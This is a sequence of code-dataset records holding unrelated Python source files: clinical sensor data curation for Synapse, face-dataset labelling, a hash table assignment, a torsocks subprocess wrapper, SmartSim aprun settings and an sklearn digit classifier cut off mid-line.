td.total_seconds())\n location = \"_\".join(location.split())\n result = result.append({\"sensor_location\": location,\n \"sensor_data\": local_range},\n ignore_index=True)\n elif sensor == \"smartwatch\":\n local_range = relevant_range.drop([\"SubjID\"], axis = 1)\n local_range = local_range.reset_index(drop=False)\n time_zero = local_range.Timestamp.iloc[0]\n time_end = local_range.Timestamp.iloc[-1]\n local_range.Timestamp = local_range.Timestamp - time_zero\n local_range.Timestamp = local_range.Timestamp.apply(\n lambda td : td.total_seconds())\n result = result.append({\"sensor_location\": None,\n \"sensor_data\": local_range},\n ignore_index=True)\n result.index = pd.Index([score.name] * len(result))\n return result\n\n\ndef slice_sensor_measurement(f, scores, relevant_task_ids, sensor):\n sensor_measurement = pd.read_csv(f.path)\n sensor_measurement.Timestamp = 
pd.to_datetime(sensor_measurement.Timestamp)\n sensor_measurement.set_index(\"Timestamp\", drop = True, inplace=True)\n sensor_measurement.sort_index(inplace=True)\n relevant_scores = scores.loc[relevant_task_ids,[\"start_utc\",\"stop_utc\"]]\n measurements = relevant_scores.apply(\n lambda score : slice_from_score(sensor_measurement, score, sensor),\n axis = 1)\n measurements = pd.concat(measurements.values, axis=0)\n return(measurements)\n\n\ndef replace_cols_with_filehandles(syn, df, cols, upload_in_parallel):\n if upload_in_parallel:\n mp = multiprocessing.dummy.Pool(4)\n for col in cols:\n df.loc[:,col] = list(mp.map(\n lambda df_ : replace_dataframe_with_filehandle(syn, df_),\n df[col]))\n else:\n for col in cols:\n df.loc[:,col] = list(map(\n lambda df_ : replace_dataframe_with_filehandle(syn, df_),\n df[col]))\n\n\ndef replace_dataframe_with_filehandle(syn, df):\n if isinstance(df, pd.DataFrame):\n f = tempfile.NamedTemporaryFile(suffix=\".csv\")\n df.to_csv(f.name, index=False)\n syn_f = syn.uploadSynapseManagedFileHandle(\n f.name, mimetype=\"text/csv\")\n f.close()\n return syn_f[\"id\"]\n else:\n return \"\"\n\n\ndef clean_scores(scores):\n # TODO: What to do with column `Side` and `Validated`?\n scores = scores.rename(SCORES_COL_MAP, axis = 1)\n scores_subset = scores.loc[:,[\"subject_id\", \"start_utc\", \"stop_utc\",\n \"tremor_left\", \"tremor_right\",\n \"bradykinesia_left\", \"bradykinesia_right\",\n \"dyskinesia_left\", \"dyskinesia_right\"]]\n # TODO: further process once we determine what column `Side` is for\n scores_subset = pd.melt(\n scores_subset,\n id_vars = [\"subject_id\", \"start_utc\", \"stop_utc\"],\n value_vars = [\"tremor_left\", \"tremor_right\",\n \"bradykinesia_left\", \"bradykinesia_right\",\n \"dyskinesia_left\", \"dyskinesia_right\"],\n value_name = \"score\")\n scores.task_code = scores.task_code.map(TASK_CODE_MAP)\n scores.start_utc = pd.to_datetime(scores.start_utc)\n scores.stop_utc = pd.to_datetime(scores.stop_utc)\n invalid_scores = scores[(pd.isnull(scores.start_utc)) | (pd.isnull(scores.stop_utc))]\n scores = scores.drop(invalid_scores.index)\n task_ids = [uuid.uuid4() for i in range(len(scores))]\n scores[\"task_id\"] = task_ids\n scores = scores.set_index(\"task_id\", drop = False)\n return scores\n\n\ndef move_index_to_column(df):\n df.reset_index(drop=False, inplace=True)\n df.rename({\"index\": \"task_id\"}, axis=1, inplace=True)\n\n\ndef create_cols(table_type, syn=None):\n if table_type == MC10_SENSOR_NAME:\n cols = [sc.Column(name=\"task_id\", columnType=\"STRING\"),\n sc.Column(name=\"sensor_location\", columnType=\"STRING\"),\n sc.Column(name=\"mc10_accelerometer\", columnType=\"FILEHANDLEID\"),\n sc.Column(name=\"mc10_gyroscope\", columnType=\"FILEHANDLEID\"),\n sc.Column(name=\"mc10_emg\", columnType=\"FILEHANDLEID\")]\n elif table_type == SMARTWATCH_SENSOR_NAME:\n cols = [sc.Column(name=\"task_id\", columnType=\"STRING\"),\n sc.Column(name=\"smartwatch_accelerometer\", columnType=\"FILEHANDLEID\")]\n elif table_type == \"scores\":\n cols = list(syn.getTableColumns(SCORES))\n for c in cols:\n c.pop('id')\n if c['name'] in SCORES_COL_MAP:\n c['name'] = SCORES_COL_MAP[c['name']]\n cols = [sc.Column(name=\"task_id\",\n columnType=\"STRING\")] + cols\n else:\n raise TypeError(\"table_type must be one of [{}, {}, {}]\".format(\n MC10_SENSOR_NAME, SMARTWATCH_SENSOR_NAME, \"scores\"))\n return cols\n\n\ndef store_dataframe_to_synapse(syn, df, parent, name, cols):\n schema = sc.Schema(name = name, columns = cols, parent = parent)\n table 
= sc.Table(schema, df)\n table = syn.store(table)\n return table\n\n\ndef main():\n args = read_args()\n syn = sc.login()\n scores = clean_scores(read_syn_table(syn, SCORES))\n\n # curate dataframes containing respective data measurements\n mc10_accelerometer = new_data_column(\n syn,\n scores = scores,\n col = \"mc10_accelerometer\",\n parent = MC10_MEASUREMENTS,\n filtering_prefix = \"Table9A\",\n sensor = \"mc10\",\n download_in_parallel = args.download_in_parallel)\n mc10_gyroscope = new_data_column(\n syn,\n scores = scores,\n col = \"mc10_gyroscope\",\n parent = MC10_MEASUREMENTS,\n filtering_prefix = \"Table9B\",\n sensor = \"mc10\",\n download_in_parallel = args.download_in_parallel)\n mc10_emg = new_data_column(\n syn,\n scores = scores,\n col = \"mc10_emg\",\n parent = MC10_MEASUREMENTS,\n filtering_prefix = \"Table9C\",\n sensor = \"mc10\",\n download_in_parallel = args.download_in_parallel)\n smartwatch_accelerometer = new_data_column(\n syn,\n scores = scores,\n col = \"smartwatch_accelerometer\",\n parent = SMARTWATCH_MEASUREMENTS,\n filtering_prefix = \"Table8\",\n sensor = \"smartwatch\",\n download_in_parallel = args.download_in_parallel)\n smartwatch_accelerometer = smartwatch_accelerometer.drop(\n \"sensor_location\", axis=1)\n\n # move task_id from index to column\n for df in [mc10_accelerometer, mc10_gyroscope,\n mc10_emg, smartwatch_accelerometer]:\n move_index_to_column(df)\n\n # combine mc10 measurements into a single file\n merged_mc10 = pd.DataFrame()\n if len(mc10_accelerometer) and len(mc10_gyroscope):\n merged_mc10 = mc10_accelerometer.merge(mc10_gyroscope, how=\"outer\")\n if len(merged_mc10) and len(mc10_emg):\n merged_mc10 = merged_mc10.merge(mc10_emg, how=\"outer\")\n\n # shuffle records so that file handle integer contains no useful information\n shuffled_mc10 = merged_mc10.sample(frac=FRAC_TO_STORE)\n shuffled_smartwatch = smartwatch_accelerometer.sample(frac=FRAC_TO_STORE)\n\n # replace the dataframes with file handles\n replace_cols_with_filehandles( # replaces in-place\n syn,\n df = shuffled_mc10,\n cols = [\"mc10_accelerometer\", \"mc10_gyroscope\", \"mc10_emg\"],\n upload_in_parallel = args.upload_in_parallel)\n replace_cols_with_filehandles( # replaces in-place\n syn,\n df = shuffled_smartwatch,\n cols = [\"smartwatch_accelerometer\"],\n upload_in_parallel = args.upload_in_parallel)\n\n # make the dataframes look pretty\n shuffled_mc10.sort_values([\"task_id\", \"sensor_location\"], inplace=True)\n shuffled_smartwatch.sort_values(\"task_id\", inplace=True)\n\n # backup in case we just created a bajillion file handles but\n # are rejected during table store\n shuffled_mc10.to_csv(\"mc10_backup.csv\", index=False)\n shuffled_smartwatch.to_csv(\"smartwatch_backup.csv\", index=False)\n scores.to_csv(\"scores_backup.csv\", index=False)\n\n # store to synapse\n shuffled_mc10_table = store_dataframe_to_synapse(\n syn,\n df = shuffled_mc10,\n parent = TABLE_OUTPUT,\n name = \"MC10 Sensor Measurements\",\n cols = create_cols(MC10_SENSOR_NAME))\n shuffled_smartwatch_table = store_dataframe_to_synapse(\n syn,\n df = shuffled_smartwatch,\n parent = TABLE_OUTPUT,\n name = \"Smartwatch Sensor Measurements\",\n cols = create_cols(SMARTWATCH_SENSOR_NAME))\n scores_table = store_dataframe_to_synapse(\n syn,\n df = scores,\n parent = TABLE_OUTPUT,\n name = \"Motor Task Timestamps and Scores\",\n cols = create_cols(\"scores\", syn=syn))\n\n\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"curate_clinic_motor_tasks.py","file_name":"curate_clinic_motor_tasks.py","file_ext":"py","file_size_in_byte":15883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"539396435","text":"import os\nimport random\nimport math\nimport copy\nDATASET = \"./lfw-deepfunneled\"\nTRAIN_TXT = \"train.txt\" \nVAL_TXT = \"val.txt\" \nPIC_FORMATS = [\"jpg\", \"png\", \"bmp\", \"jpeg\"]\nRATIO = 0.8\nMIN_PIC_NUM = 5\nPERSON_ID = 0\n\ndef get_data(person_name):\n global PERSON_ID\n pid = PERSON_ID\n res = []\n dir_name = \"%s/\" % person_name\n for name in os.listdir(DATASET + \"/\" + dir_name):\n if name.split(\".\")[-1] in PIC_FORMATS:\n res.append((pid, dir_name + name))\n if len(res) < MIN_PIC_NUM:\n pid -= 1\n return []\n PERSON_ID += 1\n random.shuffle(res)\n return res[:MIN_PIC_NUM]\n\ndef split_data(data):\n random.shuffle(data)\n i = int(math.ceil(len(data) * RATIO))\n return data[:i], data[i:]\n\ndef write_file(data, fn):\n fout = open(DATASET + \"/\" + fn, \"w\")\n for (idx, name) in data:\n fout.write(\"%s %d\\n\" % (name, idx))\n\ndef D(data):\n data = copy.copy(data)\n res = []\n tmp = []\n for group in data:\n for i in range(len(group)):\n u = (i+1) % len(group)\n res.append(group[i])\n res.append(group[u])\n tmp.append(group[i])\n random.shuffle(tmp)\n for t in tmp:\n res.append(t)\n random.shuffle(tmp)\n for t in tmp:\n res.append(t)\n return res\n\n\ntrain = []\nval = []\ntrain_o = []\nval_o = []\npeople = 0\nfor i in os.listdir(DATASET):\n try:\n train_p,val_p = split_data(get_data(i))\n if (len(val_p)):\n people += 1\n train.extend(train_p)\n val.extend(val_p)\n train_o.append(train_p)\n val_o.append(val_p)\n except:\n print (\"Ignore: %s\" % i)\n\nprint (\"People: %d\" % people)\nprint (len(train), len(val))\n'''\nrtrain = copy.copy(train)\nfor i in range(10):\n random.shuffle(rtrain)\n train.extend(rtrain)\n'''\nwrite_file(train, TRAIN_TXT)\nwrite_file(val, VAL_TXT)\n#write_file(D(train_o), TRAIN_TXT)\n#write_file(D(val_o), VAL_TXT)\n","sub_path":"build_label.py","file_name":"build_label.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"241808083","text":"import re\n\ndata = None\n\nwith open(\"input.txt\",encoding=\"utf-8\") as inpf:\n data = inpf.read().split(\"\\n\")\n\nanswer = 0\n\ndef range_compare(range1:list,range2:list)->bool:\n contains = False\n for x in range1:\n if x in range2:\n contains = True\n return contains\n\nfor d in data:\n a,b,x,y = map(int,[i for j in d.split(\",\") for i in j.split(\"-\")])\n range1 = list(range(a,b+1))\n range2 = list(range(x,y+1))\n if range_compare(range1,range2) or range_compare(range2,range1):\n answer += 1\nprint(answer)","sub_path":"2022/day-4.2.py","file_name":"day-4.2.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"166707041","text":"import matplotlib.pyplot as plt\nimport math\nimport sys\nimport scipy.optimize\nimport numpy as np\nimport apro\nfrom sympy import Matrix, zeros, pprint\nsys.path.insert(1, r'C:\\Users\\Mateusz\\wwsis_projects\\Algebra-algorytmy\\lista_1')\nfrom sy_gaussian import gaussian_elimination, solve\n\n\ndef func(x, a_0, a_1, a_2):\n return math.exp(-(a_0 + a_1*x + a_2*x**2))\n\ndef mnk():\n x = Matrix([1., 1.25, 1.5, 1.75, 2., 2.25, 2.5])\n y = Matrix([0.16, 0.99, 3.095, 4.485, 3.075, 1.01, 0.145])\n m = 3\n n = 4\n A = zeros(m, n)\n for row 
in range(m):\n for col in range(n):\n if row == 0 and col == 0:\n A[row, col] = len(x)\n elif col != n - 1:\n A[row, col] = sum([math.pow(elem, row + col) for elem in x])\n else:\n x_to_power = Matrix([math.pow(elem, row) for elem in x])\n y_ln = Matrix([math.log(elem) for elem in y])\n A [row, col] = x_to_power.dot(y_ln)\n pprint(A)\n gaussian_elimination(A)\n A = solve(A)\n for row in range(m):\n A[row] = -A[row]\n plot_x = np.linspace(1, 2.5, 100)\n plot_y = []\n plot_apro_x, plot_apro_y = apro.matrix_method()\n for elem in plot_x:\n plot_y.append(func(elem, A[0], A[1], A[2]))\n plt.scatter(x, y, color='red')\n plt.plot(plot_x, plot_y, label='e^(-(a0 + a1x + a2x^2))')\n plt.plot(plot_apro_x, plot_apro_y, color='green', label='a0 + a1x + a2x^2')\n plt.legend(loc='upper left')\n plt.show()\n\n\nif __name__ == \"__main__\":\n mnk()\n","sub_path":"lista_3/mnk.py","file_name":"mnk.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"468220423","text":"from setuptools import setup, find_packages\n\nreadme = open('README.rst').read().strip()\ninstall = open('INSTALL.rst').read().strip()\nauthors = open('AUTHORS.rst').read().strip()\nhistory = open('CHANGES.rst').read().strip()\n\nlong_description = (\n readme + '\\n\\n' + install + '\\n\\n' + authors + '\\n\\n' + history)\n\nsetup(\n name='Products.eXtremeManagement',\n version='3.0.dev0',\n description=\"Project administration which supports the eXtreme Programming methodology.\",\n long_description=long_description,\n classifiers=[\n \"Framework :: Plone\",\n \"Framework :: Plone :: 4.3\",\n \"Framework :: Zope2\",\n \"Framework :: Zope3\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n keywords='project time management',\n author='Zest Software',\n author_email='info@zestsoftware.nl',\n url='https://github.com/zestsoftware/Products.eXtremeManagement/',\n license='GPL',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['Products'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'xm.booking',\n 'xm.portlets',\n 'xm.tracker',\n 'xm.charting',\n 'kss.plugin.yuidnd',\n 'kss.plugin.cns',\n 'Products.contentmigration >= 1.0b4',\n 'Products.Poi',\n 'pygooglechart',\n 'collective.autopermission',\n 'zope.app.content',\n ],\n entry_points=\"\"\"\n # -*- Entry points: -*-\n \"\"\",\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271977485","text":"import threading\nimport subprocess\n\nimport log\n\nlogger = log.getLogger()\n\nclass Command( object ):\n\n def __init__( self, torsocksConf=\"\" ):\n\n self.env = dict()\n\n if torsocksConf:\n self.env[\"TORSOCKS_CONF_FILE\"] = torsocksConf\n\n self.command = [\"torsocks\"]\n self.process = None\n self.stdout = None\n self.stderr = None\n\n def _invokeProcess( self ):\n \"\"\"\n Invoke the process and wait for it to finish.\n\n If a callback was specified, it is called with the process' output as\n argument and together with a function which can be used to terminate\n the process.\n \"\"\"\n\n self.process = subprocess.Popen(self.command, env=self.env,\n stdout = subprocess.PIPE,\n stderr = subprocess.PIPE)\n\n if self.outputCallback:\n\n # Read the 
process' output line by line and pass it to the\n # callback.\n while True:\n\n if self.outputWatch == \"stdout\":\n line = self.process.stdout.readline().strip()\n else:\n line = self.process.stderr.readline().strip()\n\n if line:\n self.outputCallback(line, self.process.terminate)\n else:\n break\n\n # Wait for the process to finish.\n self.stdout, self.stderr = self.process.communicate()\n\n def execute( self, command, timeout=5, outputCallback=None,\n outputWatch=None ):\n\n\n self.command += command\n self.outputCallback = outputCallback\n self.outputWatch = outputWatch\n\n logger.debug(\"Invoking '%s' in environment '%s'\" %\n (' '.join(self.command),\n str(self.env)))\n\n thread = threading.Thread(target=self._invokeProcess)\n thread.start()\n thread.join(timeout)\n\n # Kill the process if it doesn't react. With fire^Wterminate().\n if thread.is_alive():\n logger.debug(\"Terminating subprocess after waiting for more \" \\\n \"than %d seconds.\" % timeout)\n try:\n self.process.terminate()\n except OSError as e:\n logger.error(e)\n\n thread.join()\n\n return (self.stdout, self.stderr)\n\n# Alias class name to provide more intuitive interface.\nnew = Command\n","sub_path":"command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"413248821","text":"import sys\nimport logging\nimport plac\n\nfrom iycaro import settings\n\nfrom .twitter import add_account as twitter_add_account\nfrom .twitter import list_accounts as twitter_list_accounts\nfrom .social import post_videos as social_post_videos\nfrom .social import like_tweets as social_like_tweets\nfrom .utils import perforated_video\nfrom .utils import perforated_video_in_gif\n\n\ncommands = {\n 'twitter_add_account': twitter_add_account,\n 'twitter_list_accounts': twitter_list_accounts,\n 'social_post_videos': social_post_videos,\n 'social_like_tweets': social_like_tweets,\n 'perforated_video': perforated_video,\n 'perforated_video_in_gif': perforated_video_in_gif,\n}\n\n\n@plac.annotations(\n debug_mode=plac.Annotation(\n help='Set logger level to DEBUG',\n kind='flag',\n abbrev='D'),\n command=plac.Annotation(\n help='Command name',\n kind='positional',\n type=str,\n choices=commands.keys()))\ndef cli(debug_mode, command, *args):\n level = logging.DEBUG if debug_mode else logging.INFO\n logging.basicConfig(\n format=settings.LOGGER_FORMAT,\n level=level)\n\n plac.call(commands[command], args)\n\n\nplac.call(cli, sys.argv[1:])\n","sub_path":"iycaro/cli/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"619965227","text":"import re\nimport collections\n\nvocabulary_size = 10000\nvocabulary_path = \"cache/vocabulary\"\n\nX_train_path = 'cache/X_train'\ny_train_path = 'cache/y_train'\nX_val_path = 'cache/X_val'\ny_val_path = 'cache/y_val'\n\nPAD_ID = 0\nGO_ID = 1\nEOS_ID = 2\nUNK_ID = 3\n\n_WORD_SPLIT = re.compile(b\"([.,!?\\\":;)(])\")\n\ndef create_save_dictionary(words, vocabulary_path, vocabulary_size):\n\n count = [['_UNK', -1]]\n count.extend(collections.Counter(words).most_common(vocabulary_size - 1))\n\n dictionary = dict()\n\n for word, _ in count:\n dictionary[word] = len(dictionary)\n\n reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n\n f = open(vocabulary_path, 'w')\n for key in dictionary:\n f.write(key + '\\n')\n f.close()\n\n return dictionary, 
reverse_dictionary\n\ndef generate_encoded_files(tokenized_sentences, dictionary):\n\n encoded_holder = []\n f1 = open(X_train_path, 'w')\n\n last_line = tokenized_sentences.pop()\n first_line = tokenized_sentences.pop(0)\n dev_counter = int(len(tokenized_sentences) - len(tokenized_sentences) /50)\n\n unk_id = dictionary['_UNK']\n first_line_encoded = encode_sentence(first_line, dictionary, unk_id)\n f1.write(first_line_encoded + '\\n')\n\n for x in xrange(dev_counter):\n encoded_sentence = encode_sentence(tokenized_sentences[x], dictionary, unk_id)\n encoded_holder.append(encoded_sentence)\n f1.write(encoded_sentence + '\\n') # Write sentence to file\n f1.close()\n\n d1 = open(X_val_path, 'w')\n for x in xrange(dev_counter, len(tokenized_sentences)):\n encoded_sentence = encode_sentence(tokenized_sentences[x], dictionary, unk_id)\n encoded_holder.append(encoded_sentence)\n d1.write(encoded_sentence + '\\n') # Write sentence to file\n\n d1.close()\n\n f2 = open(y_train_path, 'w')\n\n for x in xrange(dev_counter + 1):\n f2.write(encoded_holder[x] + '\\n') # Write sentence to file\n\n f2.close()\n\n d2 = open(y_val_path, 'w')\n for x in xrange(dev_counter + 1, len(tokenized_sentences)):\n d2.write(encoded_holder[x] + '\\n') # Write sentence to file\n\n last_line_encoded = encode_sentence(last_line, dictionary, unk_id)\n d2.write(last_line_encoded + '\\n')\n d2.close()\n\ndef encode_sentence(sentence, dictionary, unk_id):\n if not sentence:\n return \"\"\n first_word = sentence.pop(0)\n if first_word in dictionary:\n encoded_sentence = str(dictionary[first_word])\n else:\n encoded_sentence = str(unk_id)\n\n for word in sentence:\n if word in dictionary:\n encoded_word = dictionary[word]\n else:\n encoded_word = unk_id\n encoded_sentence += \" \" + str(encoded_word)\n return encoded_sentence\n\ndef read_data(path, read_as_sentence = False):\n data = []\n lines = [line.rstrip('\\n') for line in open(path)]\n local_data = []\n\n if read_as_sentence:\n for line in lines:\n local_data.append(re.findall(r'\\S+', line))\n else:\n for line in lines:\n local_data.extend(re.findall(r'\\S+', line))\n\n data.extend(local_data)\n return data\n\ndef encode_test_sentence(sentence, vocabulary):\n words = []\n\n for space_separated_fragment in sentence.strip().split():\n words.extend(re.split(_WORD_SPLIT, space_separated_fragment))\n\n words_clean = [w for w in words if w]\n\n return [vocabulary.get(w, UNK_ID) for w in words_clean]\n\ndef load_vocabulary(vocabulary_path):\n rev_vocab = []\n with open(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n\ndef prepare_dataset_encoded(dataset_path, vocabulary_size):\n\n data = read_data(dataset_path)\n dictionary, reverse_dictionary = create_save_dictionary(data, vocabulary_path, vocabulary_size)\n sentences = read_data(dataset_path, read_as_sentence=True)\n generate_encoded_files(sentences,dictionary)\n","sub_path":"preprocessing/data_preprocessor.py","file_name":"data_preprocessor.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"270152243","text":"\"\"\"\nQuadratic Probing Hash Table based functions, timings and statistics\n\n@author Mark Diedericks 30572738\n@since 21/10/2019\n@modified 21/10/2019\n\"\"\"\n\nfrom task1 import HashTable as HashTableLinear\nfrom task3 import load_dictionary_statistics\n\nclass 
HashTable(HashTableLinear): \n ### Override only the methods which directly implement linear probing ###\n ### Implement quadratic probing instead. ###\n \n def probe_step(self, i):\n \"\"\"\n Will return an integer step for the given index.\n\n @param i: the index at which to calculate the step\n @return The step, from the original hash index, which should be taken\n @complexity O(1) for both best and worst case\n \"\"\"\n return i**2;\n\n\ndef table_load_dictionary_statistics(max_time):\n \"\"\"\n Will execute load_dictionary_time on a combination of files, sizes and bases. Saving the data, along with timing and words\n to a file. Uses quadratic probing hash table instead of a linear probing hash table.\n \n @param max_time: how long load_dictionary operates before timing out, if none the function wont time out\n @return None\n @complexity O(nm) for both best and worst case. Where n is cost of load_dictionary and m is the number of size-base-file combinations\n @postcondition A file, 'output_task4.csv', will contain the filename, table, base, words, collisions, probe length, max probe length \n and rehash count time data for each combination.\n \"\"\"\n\n TABLE_BASE = [1, 27183, 250726]\n TABLE_SIZE = [250727, 402221, 1000081]\n FILE_NAMES = [\"english_small.txt\", \"english_large.txt\", \"french.txt\"]\n\n # Get output file handle\n f = open(\"output_task4.csv\", 'w+', encoding=\"UTF-8\")\n\n # Create headers\n f.write('File Name,Table Size,Table Base,Words,Time,Collisions,Probe Total,Probe Max, Rehashes\\n')\n\n # Loop through each combination\n for file in FILE_NAMES:\n for size in TABLE_SIZE:\n for base in TABLE_BASE:\n # Run combination with quadratic probing hash table\n res = load_dictionary_statistics(base, size, file, max_time, HashTable(size, base))\n\n words = res[0]\n time = res[1] if res[1] is not None else \"TIMEOUT\"\n col = res[2]\n pro = res[3]\n promax = res[4]\n rehashes = res[5]\n\n # Print results to file\n f.write('{0},{1},{2},{3},{4},{5},{6},{7},{8}\\n'.format(file, size, base, words, time, col, pro, promax, rehashes))\n\n # Close file\n f.close()\n\n # Ensure file is closed\n if not f.closed:\n raise IOError('File is not closed.')\n\n\nif __name__ == '__main__':\n table_load_dictionary_statistics(120)","sub_path":"Submission/task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"170597702","text":"# BSD 2-Clause License\n#\n# Copyright (c) 2021, Hewlett Packard Enterprise\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nfrom .settings import RunSettings\n\n\nclass AprunSettings(RunSettings):\n def __init__(self, exe, exe_args=None, run_args=None, env_vars=None):\n \"\"\"Settings to run job with ``aprun`` command\n\n ``AprunSettings`` can be used for both the `pbs` and `cobalt`\n launchers.\n\n :param exe: executable\n :type exe: str\n :param exe_args: executable arguments, defaults to None\n :type exe_args: str | list[str], optional\n :param run_args: arguments for run command, defaults to None\n :type run_args: dict[str, str], optional\n :param env_vars: environment vars to launch job with, defaults to None\n :type env_vars: dict[str, str], optional\n \"\"\"\n super().__init__(\n exe, exe_args, run_command=\"aprun\", run_args=run_args, env_vars=env_vars\n )\n self.mpmd = []\n\n def make_mpmd(self, aprun_settings):\n \"\"\"Make job a MPMD job\n\n This method combines two ``AprunSettings``\n into a single MPMD command joined with ':'\n\n :param aprun_settings: ``AprunSettings`` instance\n :type aprun_settings: AprunSettings\n \"\"\"\n self.mpmd.append(aprun_settings)\n\n def set_cpus_per_task(self, num_cpus):\n \"\"\"Set the number of cpus to use per task\n\n This sets ``--cpus-per-pe``\n\n :param num_cpus: number of cpus to use per task\n :type num_cpus: int\n \"\"\"\n self.run_args[\"cpus-per-pe\"] = int(num_cpus)\n\n def set_tasks(self, num_tasks):\n \"\"\"Set the number of tasks for this job\n\n This sets ``--pes``\n\n :param num_tasks: number of tasks\n :type num_tasks: int\n \"\"\"\n self.run_args[\"pes\"] = int(num_tasks)\n\n def set_tasks_per_node(self, num_tpn):\n \"\"\"Set the number of tasks for this job\n\n This sets ``--pes-per-node``\n\n :param num_tpn: number of tasks per node\n :type num_tpn: int\n \"\"\"\n self.run_args[\"pes-per-node\"] = int(num_tpn)\n\n def set_hostlist(self, host_list):\n \"\"\"Specify the hostlist for this job\n\n :param host_list: hosts to launch on\n :type host_list: list[str]\n :raises TypeError:\n \"\"\"\n if isinstance(host_list, str):\n host_list = [host_list.strip()]\n if not isinstance(host_list, list):\n raise TypeError(\"host_list argument must be a list of strings\")\n if not all([isinstance(host, str) for host in host_list]):\n raise TypeError(\"host_list argument must be list of strings\")\n self.run_args[\"nodelist\"] = \",\".join(host_list)\n\n def format_run_args(self):\n \"\"\"Return a list of ALPS formatted run arguments\n\n :return: list ALPS arguments for these settings\n :rtype: list[str]\n \"\"\"\n # args launcher uses\n args = []\n restricted = [\"wdir\"]\n\n for opt, value in self.run_args.items():\n if opt not in restricted:\n short_arg = bool(len(str(opt)) == 1)\n prefix = \"-\" if short_arg else \"--\"\n if not value:\n args += [prefix + opt]\n else:\n if short_arg:\n args += [prefix + opt, str(value)]\n else:\n args += [\"=\".join((prefix + opt, str(value)))]\n return args\n\n def format_env_vars(self):\n \"\"\"Format the environment variables for aprun\n\n :return: list of env vars\n :rtype: list[str]\n \"\"\"\n 
formatted = []\n if self.env_vars:\n for name, value in self.env_vars.items():\n formatted += [\"-e\", name + \"=\" + str(value)]\n return formatted\n","sub_path":"smartsim/settings/alpsSettings.py","file_name":"alpsSettings.py","file_ext":"py","file_size_in_byte":5082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"603513424","text":"import matplotlib.pyplot as plt\r\nfrom sklearn import datasets, svm, metrics\r\nfrom sklearn.model_selection import train_test_split\r\ndigits = datasets.load_digits()\r\n# digits dataset consists of 8x8 pixel images of hand written digits\r\n#images attribute of the dataset stores 8x8 arrays of grayscale values for each image\r\n# We will use these arrays to visualize the first 4 images\r\n# target attribute of the dataset stores the digit each image represents (included in title of 4 plots below)\r\n_,axes = plt.subplots(nrows=1, ncols=4, figsize=(10, 3))\r\nfor ax, image, label in zip(axes, digits.images, digits.target):\r\n ax.set_axis_off()\r\n ax.imshow(image, cmap=plt.cm.gray_r, interpolation='nearest')\r\n ax.set_title('Training: %i' % label)\r\n\r\n\r\n#flatten the images\r\n#i.e. turn each 2D array of grayscale values from shape (8, 8) into shape (64,)\r\n# entire dataset will be of shape (n_samples,n_features)\r\n#n_samples: no. of images; n_features: total number of pixels in each image\r\nn_samples = len(digits.images)\r\ndata = digits.images.reshape((n_samples, -1))\r\n#-1: value is inferred from length of array & remaining dimensions\r\n\r\n# Create a classifier: a support vector classifier\r\n#Also try with 'poly' and ‘sigmoid' kernels and different values of gamma\r\nclf = svm.SVC(kernel='rbf', gamma=0.001)\r\n\r\n# Split data into 50% train and 50% test subsets\r\nX_train, X_test, y_train, y_test = train_test_split(data, digits.target, 